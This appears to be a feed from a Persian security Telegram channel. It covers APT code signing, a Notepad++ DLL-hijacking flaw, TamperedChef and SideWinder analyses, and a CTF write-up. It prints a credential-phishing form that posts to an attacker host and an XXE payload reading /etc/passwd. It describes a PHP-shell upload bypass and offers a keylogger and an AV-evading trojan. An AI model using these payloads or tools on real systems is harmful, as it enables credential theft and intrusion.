Mr. SAM
دستورات Assembly غیرقانونی (Illegal Instructions)
Illegal Instruction.pdf
918.8 KB
Please open Telegram to view this post
VIEW IN TELEGRAM
هکرهای APT ایران از گواهینامههای SSL.com برای امضای بدافزار استفاده میکنند
گروههای سایبری ایران (Charming Kitten , Subtle Snail , UNC1549 و زیر شاخه های آنها )از تکنیکی استفاده میکنند که در آن با جعل یا سوءاستفاده از گواهیهای دیجیتال معتبر SSL/TLS ، بدافزارها و ابزارهای خود را امضا (Sign) میکنند.
### نکات کلیدی فنی و امنیتی
* هدف اصلی: هدف از امضای بدافزار با گواهی معتبر، فریب دادن سیستمعاملها (به خصوص ویندوز) و ابزارهای امنیتی (مانند EDRها و آنتیویروسها) است که اغلب برنامههای امضا شده را قابل اعتمادتر و کمتر مخرب تلقی میکنند. این امر به بدافزار اجازه میدهد تا راحتتر از فیلترهای امنیتی عبور کرده و در شبکه قربانی پایداری (Persistence) ایجاد کند.
* روشهای دستیابی به گواهیها:
* سرقت گواهی: نفوذ به زیرساختهای مراکز صدور گواهی (CA - Certificate Authority) مانند حادثه مشهور Comodo و DigiNotar در سالهای گذشته، که در آن هکرها توانستند گواهیهای جعلی برای دامنههای مهم جهانی (مثل گوگل، یاهو) صادر کنند.
* خرید گواهیهای مسروقه: خرید گواهیهای معتبر مسروقه از بازارهای زیرزمینی دارکنت.
* استفاده از گواهیهای منقضی/لغو شده: حتی برخی از گواهیهای لغو شده یا منقضی شده نیز ممکن است توسط ابزارهای امنیتی قدیمی نادیده گرفته شوند.
* تأثیر بر شناسایی: امضای معتبر باعث میشود بدافزار از لحاظ ظاهری شبیه یک نرمافزار قانونی و قانونی به نظر برسد، که این موضوع کار مهندسی معکوس و تحلیل بدافزار را برای تحلیلگران امنیتی سختتر میکند و شناسایی آن توسط سامانههای مبتنی بر امضا را مختل میسازد.
* ارتباط با APTها: این تکنیک به طور مکرر توسط گروههای APT ایرانی مشاهده شده است که نشاندهنده پیچیدگی و سطح بالای دانش فنی این بازیگران در دور زدن مکانیزمهای امنیتی پایه است.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Notepad++آسیبپذیری DLL Hijacking در ++Notepad
یک آسیبپذیری جدید DLL Hijacking (تزریق کتابخانه پیوند پویا) که به تازگی در ++Notepad ، ویرایشگر محبوب کد منبع، کشف شده است، میتواند به مهاجمان اجازه دهد تا کد دلخواه را بر روی دیوایس قربانی اجرا کنند.
این نقص که با شناسه CVE-2025-56383 ثبت شده است، در نسخه 8.8.3 وجود دارد و به طور بالقوه تمامی نسخههای نصب شده این نرمافزار را تحت تأثیر قرار میدهد، که میلیونها کاربر را در معرض خطر قرار میدهد. این آسیبپذیری به یک مهاجم محلی (Local Attacker) این امکان را میدهد که با قرار دادن یک فایل DLL مخرب در مسیری که برنامه برای بارگذاری کتابخانههای مورد نیاز خود جستجو میکند، به اجرای کد دست یابد. این نوع حمله، اصالت (Integrity) برنامه را تضعیف میکند و میتواند برای تثبیت دسترسی (Establish Persistence) یا افزایش سطح دسترسی (Escalate Privileges) در یک سیستم آلوده به کار رود.
## انتشار اکسپلویت (PoC Exploit) و جزئیات فنی
۔ DLL Hijacking از نحوه جستجو و بارگذاری کتابخانههای مورد نیاز توسط برنامههای ویندوز بهرهبرداری میکند. اگر یک برنامه بدون تعیین مسیر کامل (Full Path) برای یک DLL جستجو کند، ممکن است در چندین دایرکتوری، بر اساس یک ترتیب از پیش تعریف شده ، به دنبال آن بگردد.
یک مهاجم میتواند یک DLL مخرب با همان نام کتابخانه قانونی را در دایرکتوریای قرار دهد که قبل از مکان واقعی کتابخانه توسط سیستم جستجو میشود. هنگامی که کاربر برنامه را راهاندازی میکند، DLL مخرب به جای کتابخانه اصلی بارگذاری و اجرا میشود.
در مورد ++Notepad ، این آسیبپذیری میتواند با هدف قرار دادن DLLهای مرتبط با پلاگینهای (Plugins) آن بهرهبرداری شود. بر اساس اثبات مفهوم (PoC) منتشر شده، مهاجم میتواند فایل یک پلاگین، مانند NppExport.dll که در مسیر
++Notepad\plugins\NppExport\ قرار دارد، را با یک DLL مخرب ساختهشده سفارشی (Custom-Crafted Malicious DLL) جایگزین کند.### تکنیک Proxying برای پنهانکاری
برای پنهان ماندن از دید کاربر و اطمینان از اینکه عملکرد برنامه به صورت عادی ادامه پیدا کند، مهاجم میتواند DLL اصلی را تغییر نام دهد (مثلاً به
original-NppExport.dll ) و سپس کاری کند که جایگزین مخرب، تمام فراخوانیهای تابع قانونی (Legitimate Function Calls) را به سمت DLL اصلی تغییر نام داده شده، ارجاع (Forward) دهد.این تکنیک که به عنوان Proxying یا واسطهگری شناخته میشود، باعث میشود رفتار برنامه برای کاربر بدون مشکل (Seamless) به نظر برسد، در حالی که بار دادهای مخرب (Malicious Payload) در پسزمینه در حال اجرا است.
اندازه فایل
NppExport.dll مخرب به طور قابل توجهی کوچکتر از original-NppExport.dll است که نشاندهنده وجود کد متفاوت در آن است.### اجرای فایل مخرب
پس از راهاندازی Notepad++.exe ، برنامه، DLL مخرب را بارگذاری میکند که منجر به اجرای کد مهاجم میشود.
## تثبیت دسترسی و راهکارهای مقابله
تهدید اصلی ناشی از این آسیبپذیری، اجرای کد محلی است. مهاجمی که پیشتر از طریق بدافزار، فیشینگ یا سایر روشها، دسترسی اولیه به سیستم را به دست آورده باشد، میتواند از این نقص برای تثبیت دسترسی استفاده کند.
با Hijack کردن یک DLL در برنامهای پرکاربرد مانند ++Notepad ، کد مهاجم هر بار که کاربر ویرایشگر را باز میکند اجرا خواهد شد و این امر بقا و ماندگاری بدافزار را پس از راهاندازی مجدد سیستم تضمین میکند.
اگرچه این در تست بر روی Notepad++ v8.8.3 نصب شده از طریق نصاب رسمی انجام شده است، اما مشکل زمینهای، اساساً به نحوه بارگذاری مؤلفههای برنامه مرتبط است، که نشان میدهد هر نسخه نصب شدهای میتواند آسیبپذیر باشد.
### در حال حاضر در این لحظه، هیچ پچ رسمی از سوی توسعهدهندگان ++Notepad برای رفع CVE-2025-56383 منتشر نشده است.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Mr. SAM
ابهام:
دوستی برام نوشته :
جالبه رفتم دیدم گزارش NDV بروزرسانی نشده.
اکسپلویت مال 3 روز پیش هست.
نسخه خودم هنوز 8.8.3 هست با اینکه همیشه برام بروزرسانی میومد و رفتم دیدم توی سایت ++Notepad نسخه 8.8.5 وجود داره"
——
جدای از اینکه شما باید در مورد فرآیند گزارشدهی و انتشار اطلاعات امنیتی بدونید 👇
وضعیت واقعی اینه که : از اونجا که این آسیبپذیری از نوع متداول DLL Hijacking است، و نسخههای جدیدتر منتشر شدهاند، عموما انتظار میرود که در نسخههای بالاتر از 8.3.3 (مانند 8.8.5) این نقص رفع شده باشد. با این حال، تا زمان تأیید رسمی توسعهدهنده و بهروزرسانی NVD، نمیتوان با قاطعیت 100 درصد گفت. پس متوجه منظور بشید خودتون دیگه که چه مسائل دیگهای ممکنه پیش بیاد .
دوستی برام نوشته :
جالبه رفتم دیدم گزارش NDV بروزرسانی نشده.
اکسپلویت مال 3 روز پیش هست.
نسخه خودم هنوز 8.8.3 هست با اینکه همیشه برام بروزرسانی میومد و رفتم دیدم توی سایت ++Notepad نسخه 8.8.5 وجود داره"
——
جدای از اینکه شما باید در مورد فرآیند گزارشدهی و انتشار اطلاعات امنیتی بدونید 👇
وضعیت واقعی اینه که : از اونجا که این آسیبپذیری از نوع متداول DLL Hijacking است، و نسخههای جدیدتر منتشر شدهاند، عموما انتظار میرود که در نسخههای بالاتر از 8.3.3 (مانند 8.8.5) این نقص رفع شده باشد. با این حال، تا زمان تأیید رسمی توسعهدهنده و بهروزرسانی NVD، نمیتوان با قاطعیت 100 درصد گفت. پس متوجه منظور بشید خودتون دیگه که چه مسائل دیگهای ممکنه پیش بیاد .
❤1
تحقیقات جامع در مورد مودمهای ماهوارهای تجاری موجود در بازار نشان دهنده آسیبپذیریهای امنیتی زیادی در این تجهیزات است.
نکته : رمزگذاری در بسیاری از مودمهای ماهوارهای تجاری به طور پیشفرض غیرفعال است - و گاهی اوقات فعال کردن آن هزینه اضافی دارد. در نتیجه، بسیاری از کاربران هرگز رمزگذاری را فعال نمیکنند .
تحلیل جامع آسیبپذیریها و حملات امنیتی در مودمهای ماهوارهای (به زبان انگلیسی)👇
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Reset/Forget/Recovery Password
میگذارند و هکرها از آن به عنوان
Backdoor
استفاده میکنند .
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
A Basic Device That Cracks Hi-Tech Safes | Hacklab | WIRED
Safes are everywhere in America, securing everything from cash and guns to narcotics and sensitive personal documents—in both homes and workplaces. But with no drills or cutting tools, security researchers James Rowley and Mark Omo have developed two separate…
❤1
بدافزار TamperedChef
کمپین جدید بدافزار TamperedChef یک نمونه بارز از رویکرد مهاجمان برای ادغام تکنیکهای مهندسی نرمافزار مدرن با مکانیزمهای گریز پیشرفته است. این بدافزار با استفاده از برنامههای کاربردی تروجانشده (Trojanized Productivity Tools) مانند Calendaromatic.exe و ImageLooker.exe ، به طور هدفمند دفاعهای امنیتی سنتی را دور میزند.
۱. دسترسی اولیه
طعمه طعمههای این کمپین ابزارهای بهرهوری بهظاهر بیضرر مانند تقویم و نمایشگر تصویر هستند.
توزیع فایلهای مخرب از طریق آرشیوهای 7-Zip توزیع میشوند.
سوءاستفاده از نقص امنیتی نکته فنی کلیدی در این مرحله، بهرهبرداری از آسیبپذیری CVE-2025-0411 در مکانیزم Mark of the Web (MotW) ویندوز است.
* مکانیزم MotW: این مکانیزم برای علامتگذاری فایلهایی است که از اینترنت دانلود شدهاند و به ویندوز هشدار میدهد که باید کنترلهای امنیتی سختگیرانهتری (مانند SmartScreen ) را اعمال کند.
* حمله: با سوءاستفاده از نقص در نحوه مدیریت فایلهای 7-Zip، بدافزار میتواند بدون فعال کردن هشدارهای امنیتی مبتنی بر اعتبار (Reputation-Based Security Controls)، اجرا شود و این کار، مرحله Initial Access را برای مهاجم به شدت تسهیل میکند.
۲. پیچیدگی فنی: استفاده از NeutralinoJS و مهندسی بدافزار
چارچوب ساخت بدافزار هر دو فایل
Calendaromatic.exe و ImageLooker.exe با استفاده از NeutralinoJS ساخته شدهاند.*۔ NeutralinoJS یک چارچوب دسکتاپ سبکوزن که به توسعهدهندگان اجازه میدهد تا برنامههای دسکتاپ بومی (Native Desktop Applications) را با استفاده از HTML، CSS و JavaScript بسازند.
* مزیت برای مهاجم این انتخاب به بدافزار اجازه میدهد تا ضمن حفظ ظاهر کاملاً قانونی یک نرمافزار دسکتاپ، از قدرت و انعطافپذیری جاوا اسکریپت برای اجرای بارهای مخرب و تعامل مستقیم با APIهای سیستمعامل استفاده کند. این یک تکنیک Defense Evasion عالی است، زیرا بسیاری از راهکارهای امنیتی، رفتار چارچوبهای توسعه مشروع را بهدقت مانیتور نمیکنند.
* امضای دیجیتال استفاده از امضاهای دیجیتال معتبر (اگرچه از نهادهای مشکوک مانند CROWN SKY LLC و LIMITED LIABILITY COMPANY APPSOLUTE) به منظور فریب کاربر و همچنین دور زدن فیلترهای امنیتی مبتنی بر اعتبار و شهرت است.
۳. مکانیزم گریز پیشرفته از طریق یونیکد
یکی از پیشرفتهترین تکنیکهای گریز در این بدافزار، استفاده از هموگلیفهای یونیکد (Unicode Homoglyphs) است:
* عملکرد: بدافزار بارهای مخرب (Malicious Payloads) خود را در پاسخهای API که بهظاهر بیخطر هستند، با استفاده از هموگلیفهای یونیکد رمزگذاری (Encode) میکند.
* گریز از تشخیص: این تکنیک به بدافزار اجازه میدهد تا از سیستمهای تشخیص مبتنی بر رشته (String-Based Detection) و الگوریتمهای تطبیق امضا (Signature Matching) عبور کند. این ابزارها برای شناسایی الگوهای مشخص در ترافیک شبکه یا فایلها طراحی شدهاند. وقتی دادهها با کاراکترهای یونیکد جایگزین میشوند (که شبیه کاراکترهای عادی هستند اما کد متفاوتی دارند)، تشخیص سنتی شکست میخورد.
* کانال اجرای مخفی: هنگام اجرا، بدافزار این پیلودهای پنهان را رمزگشایی کرده و آنها را از طریق زمان اجرای NeutralinoJS اجرا میکند و عملاً یک کانال اجرای مخفی (Covert Execution Channel) ایجاد میکند که زیر رادار سیستمهای نظارتی مرسوم کار میکند.
۴. پایداری و استخراج داده
* پایداری بدافزار از طریق ایجاد وظایف زمانبندیشده (Scheduled Tasks) و تغییرات در رجیستری ویندوز (Registry Modifications) ، پایداری خود را تضمین میکند. استفاده از پرچمهای خط فرمان (Command-line Flags) مانند
--install ، --enableupdate و --fullupdate نشان میدهد که مهاجم یک معماری مدولار و قابل کنترل برای مدیریت وضعیت بدافزار دارد.* فرمان و کنترل : پس از نصب موفق، بدافزار به سرعت با سرورهای فرمان و کنترل (مانند
calendaromatic[.]com و movementxview[.]com) ارتباط برقرار میکند.* رمزگذاری C2: این ارتباطات از طریق کانالهای رمزگذاریشده (Encrypted Channels) انجام میشود، که تلاش تیمهای آبی (Blue Teams) برای شناسایی محتوای دادههای ارسالی یا دستورات دریافتی را به شدت پیچیده میکند.
* تأثیر مخرب (Impact): تأثیر بدافزار شامل:
* سرقت اعتبارنامهها و Session Tokens: استخراج اطلاعات ذخیرهشده حساس از مرورگرها.
* ربایش مرورگر (Browser Hijacking): تغییر تنظیمات مرورگر و هدایت ترافیک وب برای تسهیل فعالیتهای مخرب مستمر.
* دسترسی دائمی Backdoor: فراهم کردن امکان استخراج داده و اجرای دستورات از راه دور.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
نظر سنجی
تصمیم مهم: آیا این کانال برای شما مفید است؟
تصمیم مهم: آیا این کانال برای شما مفید است؟
Anonymous Poll
100%
1. ادامه دهید
0%
2. حذف کنید
👍1
افزونههای جعلی هوش مصنوعی در مرورگرها
مهاجمان در حال انتشار افزونههای مخرب برای خصوصا مرورگر کروم هستند که خود را به جای ابزارهای معروف هوش مصنوعی مانند ChatGPT، Claude و Perplexity جا میزنند.
روش حمله: این افزونهها پس از نصب، بهطور مخفیانه موتور جستجوی پیشفرض مرورگر شما را تغییر میدهند. در نتیجه، تمام جستجوهای شما ابتدا از سرورهای مهاجم عبور میکند.
خطر اصلی: این کار به مهاجمان اجازه میدهد تمام اطلاعاتی که جستجو میکنید (شامل دادههای شخصی، اطلاعات کاری و محرمانه) را سرقت کنند. این یک حمله از نوع Man-in-the-Middle است.
نحوه توزیع: این افزونههای مخرب اغلب از طریق تبلیغات فریبنده و ویدیوهای تبلیغاتی در یوتیوب پخش میشوند.
از نصب افزونههای ناشناس برای دسترسی به سرویسهای محبوب خودداری کنید. همیشه قبل از نصب، مجوزهای درخواستی افزونه را بهدقت بررسی کنید، بهخصوص اگر درخواست تغییر تنظیمات مرورگر را داشته باشد. تنها از منابع رسمی و کاملاً معتبر افزونه نصب کنید.
اطلاعات بیشتر و شناسایی نمونهها
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
( c++ )
یک نمونه تروجان که میتواند اکثر نرمافزارهای آنتیویروس و سندباکسها را دور بزند .
نحوه استفاده رو نوشته دقت کنید.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - hkl1x/Bypass_AV: 免杀木马样本
免杀木马样本. Contribute to hkl1x/Bypass_AV development by creating an account on GitHub.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
reverse engineering doesn't have to be hard
https://jh.live/hex-rays || Disassemble, decompile and debug with IDA Pro! Use promo code HAMMOND50 for 50% off any IDA Pro product (license discount is only applicable to individuals for any product, not corporations https://hex-rays.com/pricing) and code…
Please open Telegram to view this post
VIEW IN TELEGRAM
ابزاری برای مسدود کردن dllهای ناخواسته موقع اجرای یه برنامه - ارزشمند برای نفوذگرها و رد تیمها
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - dis0rder0x00/obex: Obex – Blocking unwanted DLLs in user mode
Obex – Blocking unwanted DLLs in user mode. Contribute to dis0rder0x00/obex development by creating an account on GitHub.
کمپین جدید SideWinder با هدف سرقت اطلاعات
گروه هکری (APT) SideWinder که یک گروه با حمایت دولتی و سابقه طولانی در عملیاتهای جاسوسی سایبری در جنوب آسیا شناخته میشود، اخیراً کمپین فیشینگ جدیدی را با استفاده از پورتالهای جعلی سرویسهای ایمیل Outlook و Zimbra آغاز کرده است. هدف اصلی این عملیات، سرقت اطلاعات ورود (Credentials) از اهداف حساس دولتی و نظامی است.
جزئیات فنی و تاکتیکهای عملیاتی
1. زیرساخت حمله:
* مهاجمان برای میزبانی صفحات فیشینگ خود از پلتفرمهای هاستینگ رایگان و معتبر مانند Netlify و pages.dev و workers.dev استفاده میکنند. این رویکرد دو مزیت کلیدی برای آنها دارد:
* فرار از مکانیزمهای دفاعی: با استفاده از سرویسهای معتبر، مهاجمان بهراحتی فیلترهای مبتنی بر reputaion دامنه را دور میزنند.
* سرعت عملیاتی بالا : این گروه قادر است بهسرعت دامنههای فیشینگ خود را تغییر دهد. طبق گزارش، هر سه تا پنج روز یک سایت جدید ایجاد میشود که این موضوع شناسایی و مسدودسازی آنها را دشوار میکند.
2. روش فریب و طعمهها:
* این گروه از اسناد با مضامین دریایی و دفاعی بهعنوان طعمه برای فریب قربانیان استفاده میکند.
* نمونههای مشخص:
* در بنگلادش، وبسایت اداره کل خریدهای دفاعی (DGDP) جعل شده و پورتالهایی با عنوان "Secured File" ایجاد گردیده که از قربانیان میخواهد برای دسترسی به جزئیات تجهیزات دفاعی ترکیه، اطلاعات ورود ایمیل خود را وارد کنند.
* در نپال، کارمندان وزارت دارایی ایمیلهایی حاوی یک فایل PDF فریبنده با عنوان सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf (در خصوص سفر نخستوزیر محترم به چین) دریافت کردهاند که آنها را به یک صفحه لاگین جعلی Outlook در بستر Netlify (با آدرس IP:
98.84.224.111 ) هدایت میکند.3. مکانیزم سرقت اطلاعات:
* برخلاف بسیاری از حملات که متکی بر پیلودهای بدافزاری سمت کلاینت هستند، این کمپین مستقیماً از طریق فرمهای HTML اطلاعات را جمعآوری میکند.
* یک فرم HTML ساده، اطلاعات وارد شده (نام کاربری و رمز عبور) را از طریق یک درخواست
POST به سرور تحت کنترل مهاجم ارسال میکند. نمونهای از این کد برای هدف قرار دادن SUPARCO (سازمان تحقیقات فضایی و جوی پاکستان) مشاهده شده است:<form method="POST" action="https://technologysupport.help/1pac.php">
<input type="hidden" name="inbox" value="Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs=">
<label for="email">Email:</label>
<input type="email" id="email" name="user_email" required>
<label for="pass">Password:</label>
<input type="password" id="pass" name="user_pass" required>
<button type="submit">Sign In</button>
</form>
* تحلیل کد:
* یک فیلد مخفی (
hidden ) با نام inbox در فرم وجود دارد که مقدار آن یک آدرس ایمیل رمزنگاریشده با Base64 است Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs= که معادل chairman@waparco.gov.pk است. این تکنیک به مهاجمان اجازه میدهد تا اطلاعات سرقتشده را با کمپینهای خاص خود مرتبط سازند.* اطلاعات مستقیماً به آدرس
https://technologysupport.help/1pac.php ارسال میشود.4. تکنیکهای تکمیلی و پنهانسازی:
* در برخی موارد، از کدهای JavaScript برای افزایش پیچیدگی حمله استفاده میشود. برای مثال، آدرس ایمیل قربانی قبل از ارسال به صفحه فیشینگ ثانویه، با Base64 کدگذاری میشود. این کار هم به ردیابی نشستها (Session Tracking) کمک میکند و هم تحلیلهای سطحی و سریع را با چالش مواجه میسازد.
* پس از ارسال اطلاعات، ممکن است یک پیغام
reload به کاربر نمایش داده شود تا در صورت ورود اطلاعات اشتباه، مجدداً آنها را وارد کند.اهداف و گستره جغرافیایی
این کمپین بهطور خاص بر روی سازمانهای دولتی و نظامی در کشورهای جنوب آسیا متمرکز است، از جمله:
* پاکستان
* نپال
* سریلانکا
* بنگلادش
* میانمار
مراحل پس از بهرهبرداری
اطلاعات سرقتشده در فرآیندهای جاسوسی گستردهتر این گروه مورد استفاده قرار میگیرد. این اطلاعات به SideWinder اجازه میدهد تا به شبکههای محدودشده دسترسی پیدا کند یا در مراحل بعدی، بدافزارهای خود را از دایرکتوریهای باز روی سرورهای خود مانند IPهای
47.236.177.123 و 31.14.142.50 مستقر کند.@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Anti-Screen.cpp
5.2 KB
یک کد ساده برای جلوگیری از گرفته شدن اسکرینشات یا ضبط ویدیو از محتوای پنجرهی برنامه که البته کاربردهای دیگهای هم داره :
1. پنهانسازی فعالیت بدافزار: یک بدافزار میتواند رابط کاربری خود (مثلاً یک پنجرهی تنظیمات یا یک فیشینگ پاپآپ) را با این تکنیک محافظت کند. این کار تحلیلگران امنیتی را که از ابزارهای مبتنی بر اسکرینشات یا ضبط ویدیو برای مستندسازی و تحلیل رفتار بدافزار در محیطهای سندباکس استفاده میکنند، با چالش مواجه میکند.
2. جلوگیری از گزارشگیری کاربر: اگر یک بدافزار یک پنجرهی جعلی برای دریافت اطلاعات حساس (مانند رمز عبور) نمایش دهد، استفاده از SetWindowDisplayAffinity میتواند مانع از این شود که کاربر به راحتی از آن پنجره اسکرینشات گرفته و برای تیم پشتیبانی یا امنیتی ارسال کند.
3. دور زدن سیستمهای مانیتورینگ: برخی از سیستمهای نظارت بر فعالیت کاربر (Employee Monitoring) یا ابزارهای (Parental Control) برای رصد فعالیتها به صورت دورهای اسکرینشات میگیرند. یک برنامه مخرب میتواند با این روش خود را از دید این سیستمها پنهان کند.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Keylogger.tar.gz
2 KB
یک کیلاگر نوشته شده با Rust
درود به همه دوستان و اساتید . این سورس کد ساده بدافزار کیلاگر که با زبان برنامهنویسی Rust قبلا به عنوان نمونه نوشته بودم برای لینوکس هست که لاگها رو جمع آوری و به تلگرام میفرسته .
نکاتی داره برای آموزش و یادگیری و البته نقاط ضعفش رو هم نوشتم که بدونید و خودتون جهت یادگیری اصلاحش کنید . مثل :
مشخص بودن مقادیر ربات تلگرام (توکن و آیدی) در سورس کد.
ثبت شدن پیغامهای خطا (eprintln!) در کد.
ثابت بودن مسیر دایرکتوری (/tmp/k-pro-logs) که به راحتی توسط ابزارهای مانیتورینگ فایل قابل شناسایی است.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
چالش CTF Anonymous
زنجیرهای از آسیبپذیریها تا اجرای کد از راه دور (RCE)
این چالش یک نمونهی آموزشی عالی از چگونگی زنجیرهای کردن آسیبپذیریها (Vulnerability Chaining) برای دستیابی به بالاترین سطح دسترسی در یک سیستم است. مهاجم با ترکیب هوشمندانه یک آسیبپذیری XML External Entity (XXE) با یک مکانیزم معیوب در بارگذاری فایل، موفق به اجرای کد از راه دور (RCE) میشود. در ادامه، هر مرحله با جزئیات فنی دقیقتر شکافته میشود.
مرحله اول: کشف و بهرهبرداری از آسیبپذیری XXE
حمله با یک آسیبپذیری کلاسیک اما همچنان بسیار خطرناک، یعنی XXE آغاز میشود.
۱. شناسایی نقطه ضعف
تحلیل کد جاوا اسکریپت در سمت کلاینت نشان میدهد که دادههای فرم در قالب یک ساختار **XML به فایل
notify.php ارسال میشوند. این الگو بلافاصله باید زنگ خطر را برای هر متخصص امنیتی به صدا درآورد. هرگاه یک برنامه ورودی کاربر را درون یک سند XML پردازش میکند، پتانسیل حمله XXE وجود دارد، مگر اینکه پردازنده XML به طور صریح و ایمن پیکربندی شده باشد.کد جاوا اسکریپت تابعی را نشان میدهد که یک پیلود XML میسازد و آن را ارسال میکند. این ساختار به مهاجم اجازه میدهد تا کنترل کامل بر محتوای XML ارسالی داشته باشد.
۲. اثبات آسیبپذیری و استخراج اطلاعات
مهاجم با استفاده از ابزاری مانند
cURL ، یک پیلود XML دستکاریشده را ارسال میکند. این پیلود شامل یک External Entity است که به یک فایل محلی روی سرور (/etc/passwd) اشاره میکند.پیلود نمونه:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</user>
<!DOCTYPE user [...]> : این بخش یک Document Type Definition (DTD) را تعریف میکند.
<!ENTITY xxe SYSTEM "file:///etc/passwd"> : این قسمت یک موجودیت (Entity) به نام
xxe تعریف میکند که محتوای آن از فایل /etc/passwd خوانده میشود.&xxe; : در بدنه XML، با فراخوانی این موجودیت، پردازنده XML محتوای فایل را جایگزین آن کرده و در پاسخ به مهاجم برمیگرداند.
موفقیت در خواندن این فایل، آسیبپذیری In-Band XXE را تأیید میکند و نشان میدهد که مهاجم قابلیت خواندن فایلهای دلخواه روی سیستم را با سطح دسترسی کاربر وبسرور (مثلاً
www-data) دارد.مرحله دوم: شناسایی میزبان مخفی و حرکت جانبی (Lateral Movement)
پس از به دست آوردن قابلیت خواندن فایل، مهاجم از این دسترسی برای فاز شناسایی (Enumeration) عمیقتر سیستم استفاده میکند.
۱. خواندن فایلهای پیکربندی
یک هدف کلیدی در این مرحله، فایلهای پیکربندی وبسرور است. در این مورد، فایل
/etc/apache2/sites-enabled/000-default.conf حاوی اطلاعات ارزشمندی است. این فایل پیکربندی Virtual Hosts در آپاچی را تعریف میکند.۲. کشف
anonupload.cyberquestمحتوای این فایل یک میزبان (Host) جدید به نام
anonupload.cyberquest را آشکار میکند که روی همان سرور و آدرس IP میزبانی میشود اما از طریق دامنه اصلی قابل دسترسی نیست. این یک تکنیک رایج برای پنهان کردن پنلهای ادمین یا سرویسهای داخلی است.۳. دسترسی به میزبان جدید
مهاجم با افزودن رکورد زیر به فایل
/etc/hosts سیستم محلی خود، به سیستمعامل خود میآموزد که چگونه دامنه anonupload.cyberquest را به آدرس IP سرور هدف ترجمه کند:35.200.207.70 anonupload.cyberquestاین کار به او اجازه میدهد تا مستقیماً به وبسایت مخفی دسترسی پیدا کند، که در این مورد یک صفحه آپلود فایل محافظتشده با رمز عبور است.
مرحله سوم: دور زدن احراز هویت و تحلیل مکانیزم آپلود
مهاجم مجدداً از همان آسیبپذیری XXE، اما این بار برای یک هدف جدید، استفاده میکند: خواندن کد منبع صفحه آپلود.
۱. استخراج کد منبع و رمز عبور
با ارسال یک پیلود XXE برای خواندن فایل
/var/www/anonupload.cyberquest/index.php ، مهاجم به کد PHP صفحه دسترسی پیدا میکند. تحلیل این کد، رمز عبور supersecret1234564_niceeeee132213 را که به صورت Hardcoded در کد قرار داده شده است، فاش میکند. این یک اشتباه امنیتی بسیار رایج و خطرناک است.۲. ورود به پنل آپلود
پس از ورود، مهاجم با یک فرم آپلود فایل مواجه میشود که دارای چندین لایه امنیتی است. تحلیل این لایهها کلید موفقیت در مرحله نهایی است.
مرحله چهارم: دور زدن پیچیده فیلتر آپلود فایل
این بخش جذابترین و فنیترین قسمت چالش است و یک ضعف کلاسیک در منطق برنامهنویسی را به نمایش میگذارد.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Mr. SAM
۱. تلاشهای اولیه و جمعآوری اطلاعات
* تلاش اول (دور زدن MIME Type): مهاجم یک شل PHP را با هدر
* تلاش دوم (عدم تطابق محتوا و پسوند): مهاجم یک فایل PNG معتبر (با Magic Number صحیح) اما با پسوند
این خطاها اطلاعات ارزشمندی به مهاجم میدهند: هم محتوای فایل باید شبیه یک تصویر مجاز باشد و هم پسوند آن باید در لیست سفید (Whitelist) باشد.
۲. کشف آسیبپذیری کلیدی در منطق PHP
تحلیل مجدد کد
* منطق اعتبارسنجی (معیوب):
این کد نام فایل را بر اساس کاراکتر
* منطق ذخیرهسازی (امن):
در مقابل، برای تعیین پسوند نهایی جهت ذخیرهسازی، کد از تابع امن و استاندارد
این تضاد در منطق، یک حفره امنیتی کلاسیک ایجاد میکند. اعتبارسنجی روی یک بخش از نام فایل (jpeg) انجام میشود، اما فایل با بخش دیگری از نام آن (php) ذخیره میشود.
۳. ساخت پیلود نهایی و دستیابی به RCE
برای موفقیت در آپلود، مهاجم باید هر دو شرط را برآورده کند:
1. دور زدن بررسی محتوا: یک فایل JPEG معتبر ایجاد میکند. سپس با استفاده از ابزاری مانند
2. **دور زدن بررسی پسوند: نام فایل را به
با آپلود این فایل دستکاریشده، تمام لایههای امنیتی دور زده میشوند. فایل به عنوان یک تصویر معتبر با پسوند
۴. اجرای دستور و خواندن پرچم
اکنون مهاجم میتواند از طریق مرورگر به شل آپلود شده دسترسی پیدا کرده و با استفاده از پارامتر
با اجرای دستور
### نتیجه:
این چالش به زیبایی نشان میدهد که چگونه ترکیبی از آسیبپذیریهای به ظاهر جداگانه میتواند منجر به نفوذ کامل شود. راهکارهای مقابله باید به صورت لایهای و جامع پیادهسازی شوند:
1. مقابله با XXE:
* پردازندههای XML باید به گونهای پیکربندی شوند که پردازش External Entities و DTDs به طور کامل غیرفعال باشد. در PHP (با استفاده از کتابخانه libxml)، این کار با دستور زیر قبل از بارگذاری XML انجام میشود:
* تلاش اول (دور زدن MIME Type): مهاجم یک شل PHP را با هدر
Content-Type: image/jpeg آپلود میکند. خطا نشان میدهد که سرور فقط به هدر اکتفا نکرده و محتوای فایل را نیز بررسی میکند. احتمالاً با استفاده از توابعی مانند getimagesize() یا finfo_file() که Magic Numbers (بایتهای اولیه فایل) را بررسی میکنند.* تلاش دوم (عدم تطابق محتوا و پسوند): مهاجم یک فایل PNG معتبر (با Magic Number صحیح) اما با پسوند
